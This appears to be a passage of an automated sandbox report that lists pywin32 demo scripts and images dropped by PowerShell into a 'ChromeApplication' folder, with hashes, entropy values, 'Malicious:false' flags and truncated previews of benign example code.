                                                                                                                                                                                                  Preview:# 'Request' example added jjk 11/20/98..import dde.import win32ui..server = dde.CreateServer().server.Create("TestClient")..conversation = dde.CreateConversation(server)..conversation.ConnectTo("RunAny", "RunAnyCommand").conversation.Exec("DoSomething").conversation.Exec("DoSomethingElse")..conversation.ConnectTo("RunAny", "ComputeStringLength").s = "abcdefghi".sl = conversation.Request(s).print('length of "%s" is %s' % (s, sl)).

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32\Demos\dde\ddeserver.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):1093
                                                                                                                                                                                                  Entropy (8bit):4.931498351786163
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:24:hhtBDAVAasXt8ABeuAf6dABenvAnD4AWbCQov1tX6QK:zD4YXt8Yeua2YenvAnkvbCQov1tX+
                                                                                                                                                                                                  MD5:3F9B69FE31E611D153BE7DF14BAF4C0D
                                                                                                                                                                                                  SHA1:B2ABC26EC0E8C5C849873A3EBC65D14555279B1B
                                                                                                                                                                                                  SHA-256:BDB3478C65F4F8AE8FD7AF89F87C8BD24EAC5B92B9146E4A42E699CAC6342B5A
                                                                                                                                                                                                  SHA-512:94FCF00EFA048DCE40A2753BE45CC8C9C475893BD1DBD2C050631C877A097E5FAEFAE1A34B47099C6C14B000DFAFF6EE4F7864250F8A4FE7D5A1230ABAB8E18E
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:# 'Request' example added jjk 11/20/98..import dde.import win32ui.from pywin.mfc import object...class MySystemTopic(object.Object):. def __init__(self):. object.Object.__init__(self, dde.CreateServerSystemTopic()).. def Exec(self, cmd):. print("System Topic asked to exec", cmd)...class MyOtherTopic(object.Object):. def __init__(self, topicName):. object.Object.__init__(self, dde.CreateTopic(topicName)).. def Exec(self, cmd):. print("Other Topic asked to exec", cmd)...class MyRequestTopic(object.Object):. def __init__(self, topicName):. topic = dde.CreateTopic(topicName). topic.AddItem(dde.CreateStringItem("")). object.Object.__init__(self, topic).. def Request(self, aString):. print("Request Topic asked to compute length of:", aString). return str(len(aString))...server = dde.CreateServer().server.AddTopic(MySystemTopic()).server.AddTopic(MyOtherTopic("RunAnyCommand")).server.AddTopic(MyRequestTopic("Com

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32\Demos\desktopmanager.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):8141
                                                                                                                                                                                                  Entropy (8bit):4.832909840782592
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:96:DTaWV0QcMBmT0KvPyS8271m87r8s8pFq46wo7j5bpad0/d:DVcRDr8271murH546wOj5bpae/d
                                                                                                                                                                                                  MD5:FF37EA7B3799F4BD22071D7DCB0C7FC7
                                                                                                                                                                                                  SHA1:59C09297374FC5AC1EF12A9E4DC8C5E6494F0B7C
                                                                                                                                                                                                  SHA-256:D7A85B4943DFC4F90973D46EF55DBEE8642BB24177EF95E561D5AFDD7462E018
                                                                                                                                                                                                  SHA-512:072ABEDC346D3F13DCA1026F854915EB38D5A476E30E349A6C16C41DF852BD217001B52F84A00693FEECC8FAB94849C8B93104F43843C796872A0A908DDA26C9
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:# Demonstrates using a taskbar icon to create and navigate between desktops..import _thread.import io.import time.import traceback..import pywintypes.import win32api.import win32con.import win32gui.import win32process.import win32service..## "Shell_TrayWnd" is class of system tray window, broadcasts "TaskbarCreated" when initialized...def desktop_name_dlgproc(hwnd, msg, wparam, lparam):. """Handles messages from the desktop name dialog box""". if msg in (win32con.WM_CLOSE, win32con.WM_DESTROY):. win32gui.DestroyWindow(hwnd). elif msg == win32con.WM_COMMAND:. if wparam == win32con.IDOK:. desktop_name = win32gui.GetDlgItemText(hwnd, 72). print("new desktop name: ", desktop_name). win32gui.DestroyWindow(hwnd). create_desktop(desktop_name).. elif wparam == win32con.IDCANCEL:. win32gui.DestroyWindow(hwnd)...def get_new_desktop_name(parent_hwnd):. """Create a dialog box to ask the user for name of desktop

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32\Demos\eventLogDemo.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):4421
                                                                                                                                                                                                  Entropy (8bit):4.394676077658835
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:96:9Gs7qeCumrvPFWj9uOLTzMfOkqJq3NZMm5mmPFPgjX:9Gs7qenovPFWsGTYAtmPFPgjX
                                                                                                                                                                                                  MD5:A787AB4A5D05E3A55541E621CC5FA92B
                                                                                                                                                                                                  SHA1:8212FEA481713144E60BC21F5AF8138955F65FF4
                                                                                                                                                                                                  SHA-256:26001027A54ABA3A92CD496D7AC0799BCB595C8B77E98FFA04E74F2CFFDCA113
                                                                                                                                                                                                  SHA-512:6AC6087DEAE2958DF2192312E05A89AAE6AC14D9E9AFAB844D218A20D1729CC0A0D6B8CCC9E5BF4115F5529FFB0BBCF0B3AAC05BC4710C9DE9941CE0B57EBCF5
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:import win32api # To translate NT Sids to account names..import win32con.import win32evtlog.import win32evtlogutil.import win32security...def ReadLog(computer, logType="Application", dumpEachRecord=0):. # read the entire log back.. h = win32evtlog.OpenEventLog(computer, logType). numRecords = win32evtlog.GetNumberOfEventLogRecords(h). # print "There are %d records" % numRecords.. num = 0. while 1:. objects = win32evtlog.ReadEventLog(. h,. win32evtlog.EVENTLOG_BACKWARDS_READ | win32evtlog.EVENTLOG_SEQUENTIAL_READ,. 0,. ). if not objects:. break. for object in objects:. # get it for testing purposes, but dont print it.. msg = win32evtlogutil.SafeFormatMessage(object, logType). if object.Sid is not None:. try:. domain, user, typ = win32security.LookupAccountSid(. computer, object.Sid. )

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32\Demos\getfilever.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):1126
                                                                                                                                                                                                  Entropy (8bit):4.847240732987727
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:24:j4TypXUFzmG73wIujOHRuMxqNclmIIzSrNyNHD4couDZgAuwsIo:aQXUDsILuMxXlmIoGYHxouDZHHsIo
                                                                                                                                                                                                  MD5:4F0AC86AB91546ECFCD2EAEFEC6A9516
                                                                                                                                                                                                  SHA1:847E7F42C9D282A1B8A7DFBEF8918341B76CFD75
                                                                                                                                                                                                  SHA-256:6DB2C4E7E5D5EFB2673FD1860F51627F0B84DB21A68AC331C51B3AFB41F7B684
                                                                                                                                                                                                  SHA-512:7A41AB6EE47275F89BEC82CE0EF9C6D417E88DCC094C653F95D1ABB88E6FC3FBA4F96A423071A32FEB2A3A8DD2D8AC1CBC9E2A33DA4C917ED234F347D1CB987D
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:import os..import win32api..ver_strings = (. "Comments",. "InternalName",. "ProductName",. "CompanyName",. "LegalCopyright",. "ProductVersion",. "FileDescription",. "LegalTrademarks",. "PrivateBuild",. "FileVersion",. "OriginalFilename",. "SpecialBuild",.).fname = os.environ["comspec"].d = win32api.GetFileVersionInfo(fname, "\\").## backslash as parm returns dictionary of numeric info corresponding to VS_FIXEDFILEINFO struc.for n, v in d.items():. print(n, v)..pairs = win32api.GetFileVersionInfo(fname, "\\VarFileInfo\\Translation").## \VarFileInfo\Translation returns list of available (language, codepage) pairs that can be used to retreive string info.## any other must be of the form \StringfileInfo\%04X%04X\parm_name, middle two are language/codepage pair returned from above.for lang, codepage in pairs:. print("lang: ", lang, "codepage:", codepage). for ver_string in ver_strings:. str_info = "\\StringFileInfo\\%04X%04X\\%s" % (lang,

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32\Demos\images\frowny.bmp

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:PC bitmap, Windows 3.x format, 32 x 32 x 24, image size 3072, cbSize 3126, bits offset 54
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):3126
                                                                                                                                                                                                  Entropy (8bit):4.866601281143834
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:48:QJbd92m1SGlnHZ4Yuu5I/p/UdCHMaVU42PVA0O0JR0Rj70Rp0OCv0QQH080D9m:QJbd911zlq/5JFj2NU6xyv9m
                                                                                                                                                                                                  MD5:67D3F80FA18D9298FB9BD346BF1905F3
                                                                                                                                                                                                  SHA1:8528E2B4B8E8681828518337925D2876809B7454
                                                                                                                                                                                                  SHA-256:4601AF795B74E772A5995E2A546C1D0ADACFC91034253E7B290BDFF4F34E22F5
                                                                                                                                                                                                  SHA-512:F52A0DF170AF6E1A43947C66EE5C97B9A2A7669A21FDABA24490CB97C5FD8450920E79AA2205D3E11DD7484D2CE95FAA7043D621E278025A9081C5F060BA7347
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:BM6.......6...(... ... ...........................................................................................................................................................................................................................................................................................@..@............................................................................................@..@........................................................................................."..$..&.... .. ..*..*.............................................................................."..$.... .. ..*..*....................................#.$#.$......................................."..$..&..)..+......................................#.$#.$.........................................."..$..&..)........................................................................................."..$..&..)..+................................$....................................................."..$..&..)

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32\Demos\images\smiley.bmp

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:PC bitmap, Windows 3.x format, 32 x 32 x 24, image size 3072, cbSize 3126, bits offset 54
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):3126
                                                                                                                                                                                                  Entropy (8bit):4.039217657290414
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:48:i27oH9YEJtIq0Q0x0P0n5Z0wZaG0WQv0NN0C0nw:dfRYw
                                                                                                                                                                                                  MD5:CA4F178B4A665A1DA21AEA80C7E796F7
                                                                                                                                                                                                  SHA1:3A7E64ADC019F45290C43B04E6A1072A55470586
                                                                                                                                                                                                  SHA-256:C22E778D80B2E76DDF1588FF1588331B577141D12BC3EA30DBFFDD7E85FD82C0
                                                                                                                                                                                                  SHA-512:97BDC1BAE0FAC2582ABF11F318937318D33EFF1664CCE499C4D95316A25CB87B0599E9E4CAA5D911B0F465E4F491A4E2F23E4EE87E14D9A0C8CE1FD6150982E9
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:BM6.......6...(... ... .................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................#.$#.$..........................................................................................#.$#.$..........................................................................................................................................................................................$...............................................................

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32\Demos\mmapfile_demo.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script text executable Python script, ASCII text executable
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):2888
                                                                                                                                                                                                  Entropy (8bit):4.8375775005209265
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:48:knDxrrsqXh6/6LCN8Czanw7IbHbfqVGvr7lFqkVlL7ukeTX1:knDxrrTXg/6LC3GsKbfqVGjPqG3c1
                                                                                                                                                                                                  MD5:A333358AEA4B17F65D614B8ABFE55ED4
                                                                                                                                                                                                  SHA1:94F0486D40A0D9A6C65AE10CDD78122B37DB7F24
                                                                                                                                                                                                  SHA-256:FFED0CEB4B51A0800A19600776E389A112E465E842BCFC98EDE1E8426AF0DF5F
                                                                                                                                                                                                  SHA-512:F6B99C26C726D736A119AA10A4907AB61E8FA36CBB138EC7FAFBAD1E68A55BFC78F300B214639C7BB25F0DD1F6810F8E1AE7A1DE4C23FF43917C3E22A59AA45B
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:import os.import tempfile..import mmapfile.import win32api.import winerror.from pywin32_testutil import str2bytes..system_info = win32api.GetSystemInfo().page_size = system_info[1].alloc_size = system_info[7]..fname = tempfile.mktemp().mapping_name = os.path.split(fname)[1].fsize = 8 * page_size.print(fname, fsize, mapping_name)..m1 = mmapfile.mmapfile(File=fname, Name=mapping_name, MaximumSize=fsize).m1.seek(100).m1.write_byte(str2bytes("?")).m1.seek(-1, 1).assert m1.read_byte() == str2bytes("?")..## A reopened named mapping should have exact same size as original mapping.m2 = mmapfile.mmapfile(Name=mapping_name, File=None, MaximumSize=fsize * 2).assert m2.size() == m1.size().m1.seek(0, 0).m1.write(fsize * str2bytes("s")).assert m2.read(fsize) == fsize * str2bytes("s")..move_src = 100.move_dest = 500.move_size = 150..m2.seek(move_src, 0).assert m2.tell() == move_src.m2.write(str2bytes("m") * move_size).m2.move(move_dest, move_src, move_size).m2.seek(move_dest, 0).assert m2.read(move_s

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32\Demos\pipes\cat.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):335
                                                                                                                                                                                                  Entropy (8bit):4.496864057756722
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:6:9Msoe/ErAzXKkYHPUHyHmYTR7VgWxvyLW3StbYTR7Vf3v//ZeSZ/XJXrdiLUs6:OVe/EUTbZHyHmYTbvvebYTb/v/tJ7gL4
                                                                                                                                                                                                  MD5:9958EDE52157CBF9F56DFF07C4499108
                                                                                                                                                                                                  SHA1:5D1EABF96A11361804DDA8FB94BF9E3E902FA540
                                                                                                                                                                                                  SHA-256:DA45A4922FA32C3668876043811CCCC43198C89C263B17FBD3CDE4BDDD988496
                                                                                                                                                                                                  SHA-512:575187E4345C37B119838503400E938560BF5AAEE2B6CAAA62835BAC76EA832DC06E779C35EE898748116FA69807ABA580D5462490BE7738E2BC029E9855FBC1
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:"""cat.py.a version of unix cat, tweaked to show off runproc.py."""..import sys..data = sys.stdin.read(1).sys.stdout.write(data).sys.stdout.flush().while data:. data = sys.stdin.read(1). sys.stdout.write(data). sys.stdout.flush().# Just here to have something to read from stderr..sys.stderr.write("Blah...")..# end of cat.py.

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32\Demos\pipes\runproc.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):4029
                                                                                                                                                                                                  Entropy (8bit):4.550391036233513
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:96:qG4T/T68SbTXy62/K+KovQtw6guU/Tm3Z+Bo2x:qbLgXy6WKcHIEig
                                                                                                                                                                                                  MD5:EA0603E314B6C0CB3396B100E9AA1A2C
                                                                                                                                                                                                  SHA1:FE3D6C231A64E599C31582F58FD2B45C014C728B
                                                                                                                                                                                                  SHA-256:837AADE7BA490576FD507189F3BDA6EB0521F56EF44822A8BCD1057D1E271F08
                                                                                                                                                                                                  SHA-512:3A58C4569855F08E252D5C339A6B80308EA1FAD4168E9F50B9387631CFC118DEAD08F56DFA8D718614A24FC17F956637DEB10F36CAC95711C5A2A757941049DE
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:"""runproc.py..start a process with three inherited pipes..Try to write to and read from those.."""..import msvcrt.import os..import win32api.import win32con.import win32file.import win32pipe.import win32process.import win32security...class Process:. def run(self, cmdline):. # security attributes for pipes. sAttrs = win32security.SECURITY_ATTRIBUTES(). sAttrs.bInheritHandle = 1.. # create pipes. hStdin_r, self.hStdin_w = win32pipe.CreatePipe(sAttrs, 0). self.hStdout_r, hStdout_w = win32pipe.CreatePipe(sAttrs, 0). self.hStderr_r, hStderr_w = win32pipe.CreatePipe(sAttrs, 0).. # set the info structure for the new process.. StartupInfo = win32process.STARTUPINFO(). StartupInfo.hStdInput = hStdin_r. StartupInfo.hStdOutput = hStdout_w. StartupInfo.hStdError = hStderr_w. StartupInfo.dwFlags = win32process.STARTF_USESTDHANDLES. # Mark doesn't support wShowWindow yet.. # StartupInfo.dwFla

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32\Demos\print_desktop.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):2859
                                                                                                                                                                                                  Entropy (8bit):5.16397412167526
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:48:3Iusl8P/XKhIH+DvhcqR1sPH8C72hDhKqMhKNtwKGzQigwFz3rYA/9:3IuslyfJ+9NR1OOAQihz3rYA/9
                                                                                                                                                                                                  MD5:6358F39A6DC68902315A154AA803745C
                                                                                                                                                                                                  SHA1:32C7399756A96B1A7EC0CEC7708713B7A7B5A904
                                                                                                                                                                                                  SHA-256:008B4576E46966832603683F16735B22AD0950969DFA362FF593E169C665EB12
                                                                                                                                                                                                  SHA-512:F8492FE12112BA5F792D30E733F7530D40F1B0A4E39A2970CD70B3785B3EE68B3CF86B1E8DFFEDD949F1CE4718AA80CEC2E433076D416E6B9E2C71273A5C3968
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:import pywintypes.import win32api.import win32con.import win32gui.import win32print..pname = win32print.GetDefaultPrinter().print(pname).p = win32print.OpenPrinter(pname).print("Printer handle: ", p).print_processor = win32print.GetPrinter(p, 2)["pPrintProcessor"].## call with last parm set to 0 to get total size needed for printer's DEVMODE.dmsize = win32print.DocumentProperties(0, p, pname, None, None, 0).## dmDriverExtra should be total size - fixed size.driverextra = (. dmsize - pywintypes.DEVMODEType().Size.) ## need a better way to get DEVMODE.dmSize.dm = pywintypes.DEVMODEType(driverextra).dm.Fields = dm.Fields | win32con.DM_ORIENTATION | win32con.DM_COPIES.dm.Orientation = win32con.DMORIENT_LANDSCAPE.dm.Copies = 2.win32print.DocumentProperties(. 0, p, pname, dm, dm, win32con.DM_IN_BUFFER | win32con.DM_OUT_BUFFER.)..pDC = win32gui.CreateDC(print_processor, pname, dm).printerwidth = win32print.GetDeviceCaps(pDC, win32con.PHYSICALWIDTH).printerheight = win32print.GetDeviceC

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32\Demos\rastest.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):5119
                                                                                                                                                                                                  Entropy (8bit):4.511953665676077
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:96:wIXZgAxi7KRWyEAkFY564o3qwi0JjfcAfB++IsYZ+zi:wIJ1A7cWyExOdo3qsjUAfB++UUi
                                                                                                                                                                                                  MD5:347610E8C7711F155A18C0D2F7C0352B
                                                                                                                                                                                                  SHA1:85807052AA60E4B5C373A4F58247F28D17687127
                                                                                                                                                                                                  SHA-256:7E0672B7B0DECDB4DE70FD6E60310F2C7680B6BB72637532CF9B1F7309C87C25
                                                                                                                                                                                                  SHA-512:74166363C0DF4D2E2AFE037DE405E964F57BD50DD5464D749861C46C4E1031969D13D62286283EA4EF202E04846DF86E34EEA47F554CDD259622185075975483
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:# rastest.py - test/demonstrate the win32ras module..# Much of the code here contributed by Jethro Wright...import os.import sys..import win32ras..# Build a little dictionary of RAS states to decent strings..# eg win32ras.RASCS_OpenPort -> "OpenPort".stateMap = {}.for name, val in list(win32ras.__dict__.items()):. if name[:6] == "RASCS_":. stateMap[val] = name[6:]..# Use a lock so the callback can tell the main thread when it is finished..import win32event..callbackEvent = win32event.CreateEvent(None, 0, 0, None)...def Callback(hras, msg, state, error, exterror):. # print "Callback called with ", hras, msg, state, error, exterror. stateName = stateMap.get(state, "Unknown state?"). print("Status is %s (%04lx), error code is %d" % (stateName, state, error)). finished = state in [win32ras.RASCS_Connected]. if finished:. win32event.SetEvent(callbackEvent). if error != 0 or int(state) == win32ras.RASCS_Disconnected:. # we know for sure t

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32\Demos\security\GetTokenInformation.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):3738
                                                                                                                                                                                                  Entropy (8bit):4.905364376160403
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:96:wbyTs6+DD1B+xkMJ6g09u1n5B82lHIOt8qtbvGAB2qX60:ti1B6kw702n5B82lHIvWNB2260
                                                                                                                                                                                                  MD5:7B913DC758A779FFDDEA7E0D37EBE7A5
                                                                                                                                                                                                  SHA1:663C68C7B556954444E5B5BAA991578B85A43871
                                                                                                                                                                                                  SHA-256:482D57BCEB5C175FFDB0C2BE6CD25CEF2131D8F327B47926C7DA699DB9A89A80
                                                                                                                                                                                                  SHA-512:C500AAB1BCD3DD9F005A65A173C0D0B63823952CE864BD0F4C10C44C549A86B02E437218720327E187C457666D5C94A2EFDE25A20E70BC4B62EC4655D44734DF
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:""" Lists various types of information about current user's access token,. including UAC status on Vista."""..import pywintypes.import win32api.import win32con.import win32security.import winerror.from security_enums import (. SECURITY_IMPERSONATION_LEVEL,. TOKEN_ELEVATION_TYPE,. TOKEN_GROUP_ATTRIBUTES,. TOKEN_PRIVILEGE_ATTRIBUTES,. TOKEN_TYPE,.)...def dump_token(th):. token_type = win32security.GetTokenInformation(th, win32security.TokenType). print("TokenType:", token_type, TOKEN_TYPE.lookup_name(token_type)). if token_type == win32security.TokenImpersonation:. imp_lvl = win32security.GetTokenInformation(. th, win32security.TokenImpersonationLevel. ). print(. "TokenImpersonationLevel:",. imp_lvl,. SECURITY_IMPERSONATION_LEVEL.lookup_name(imp_lvl),. ).. print(. "TokenSessionId:",. win32security.GetTokenInformation(th, win32security.TokenSessionId),. ).. privs = win

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32\Demos\security\account_rights.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):1601
                                                                                                                                                                                                  Entropy (8bit):5.2466444341148915
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:24:1hmZwhp2hVJhBhh/zznnPUMSdDa4MYC/pkCO73AgELLGmrG73AKNn:13hcrJnhJ3nnPPSNXMYC/mEgELLwEYn
                                                                                                                                                                                                  MD5:A8EB3625681C9A6CC94C98E822B01430
                                                                                                                                                                                                  SHA1:866FD6D4341E8063991E151E331790C267719092
                                                                                                                                                                                                  SHA-256:16CA9F905009A0526D1D5ED466271F86F4F75663AE2E6AE7DA22A5E5AA585CDF
                                                                                                                                                                                                  SHA-512:C33BB12877845E24DA0529F2C2CE99B82DC5F83312D027E2FCBD7CF22B7441E205BFB3E508293E73D7F4C95ECC4FF79F8C2092720E6CD19A5B98A1F59CCC1628
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:import ntsecuritycon.import win32api.import win32con.import win32file.import win32security.from security_enums import ACCESS_MODE, ACE_FLAGS, TRUSTEE_FORM, TRUSTEE_TYPE..new_privs = (. (. win32security.LookupPrivilegeValue("", ntsecuritycon.SE_SECURITY_NAME),. win32con.SE_PRIVILEGE_ENABLED,. ),. (. win32security.LookupPrivilegeValue("", ntsecuritycon.SE_CREATE_PERMANENT_NAME),. win32con.SE_PRIVILEGE_ENABLED,. ),. (. win32security.LookupPrivilegeValue("", "SeEnableDelegationPrivilege"),. win32con.SE_PRIVILEGE_ENABLED,. ), ##doesn't seem to be in ntsecuritycon.py ?.)..ph = win32api.GetCurrentProcess().th = win32security.OpenProcessToken(. ph, win32security.TOKEN_ALL_ACCESS.) ##win32con.TOKEN_ADJUST_PRIVILEGES).win32security.AdjustTokenPrivileges(th, 0, new_privs)..policy_handle = win32security.GetPolicyHandle("", win32security.POLICY_ALL_ACCESS).tmp_sid = win32security.LookupAccountName("", "tmp")[0]..privs = [. ntsecuri

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32\Demos\security\explicit_entries.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):4982
                                                                                                                                                                                                  Entropy (8bit):5.24705878297574
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:96:8FBrRcYK5NhJ3PqF5VjhInHnp7PWKqocmucmPcmwcm9cmFcmZcmRcm3wK:Or+YK5NhJ/qHcnHp7PWKqocmucmPcmwb
                                                                                                                                                                                                  MD5:ECA138C7B9FBBEDA6649E1E09F0DF95D
                                                                                                                                                                                                  SHA1:D396A7CF23F109CC687B2D65A39EBC8631D5501B
                                                                                                                                                                                                  SHA-256:9A5B596AB47503F4E5FCB0D02D1B21C1AD94F1F036B981A99F4FE9C8501CA139
                                                                                                                                                                                                  SHA-512:1600C901014A6FCA6CCA41EAC797A6FA340E994D8613130074E2872FF294B09A6B76916A732DB31CF50E941591DCC12BB8BEC5D4494921AA67AFBBDCBAB6A2C3
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:import os..import ntsecuritycon.import win32api.import win32con.import win32file.import win32security.from security_enums import ACCESS_MODE, ACE_FLAGS, TRUSTEE_FORM, TRUSTEE_TYPE..fname = os.path.join(win32api.GetTempPath(), "win32security_test.txt").f = open(fname, "w").f.write("Hello from Python\n").f.close().print("Testing on file", fname)..new_privs = (. (. win32security.LookupPrivilegeValue("", ntsecuritycon.SE_SECURITY_NAME),. win32con.SE_PRIVILEGE_ENABLED,. ),. (. win32security.LookupPrivilegeValue("", ntsecuritycon.SE_SHUTDOWN_NAME),. win32con.SE_PRIVILEGE_ENABLED,. ),. (. win32security.LookupPrivilegeValue("", ntsecuritycon.SE_RESTORE_NAME),. win32con.SE_PRIVILEGE_ENABLED,. ),. (. win32security.LookupPrivilegeValue("", ntsecuritycon.SE_TAKE_OWNERSHIP_NAME),. win32con.SE_PRIVILEGE_ENABLED,. ),. (. win32security.LookupPrivilegeValue("", ntsecuritycon.SE_CREATE_PERMANENT_NAME),. win3

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32\Demos\security\get_policy_info.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):1243
                                                                                                                                                                                                  Entropy (8bit):4.826107186911052
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:24:1dVaWnVQMN4MvDZriSrxC8rrkiQOIiThZUIiCZfpirjFNn:1zXvDnxC8rVUYf8jzn
                                                                                                                                                                                                  MD5:474FBFA718653659E1E7041B60B5CDC1
                                                                                                                                                                                                  SHA1:BDAD73C99EBB28EB782B81F6B9365C8D9F53A429
                                                                                                                                                                                                  SHA-256:EE3264A6EA5BC3EF455DB3B1308E6D6EFD153736B3864C6AFFE3CF83A4C1DD29
                                                                                                                                                                                                  SHA-512:952543CA9A75A9D3F3CB0B6C573AE1CA58849370EF5FD4D3A2A5D3DB6BEBAADC54EE226C317F8C9DE1C6C101BE4DB82F692D284C722D3873ED82F9405B1660AE
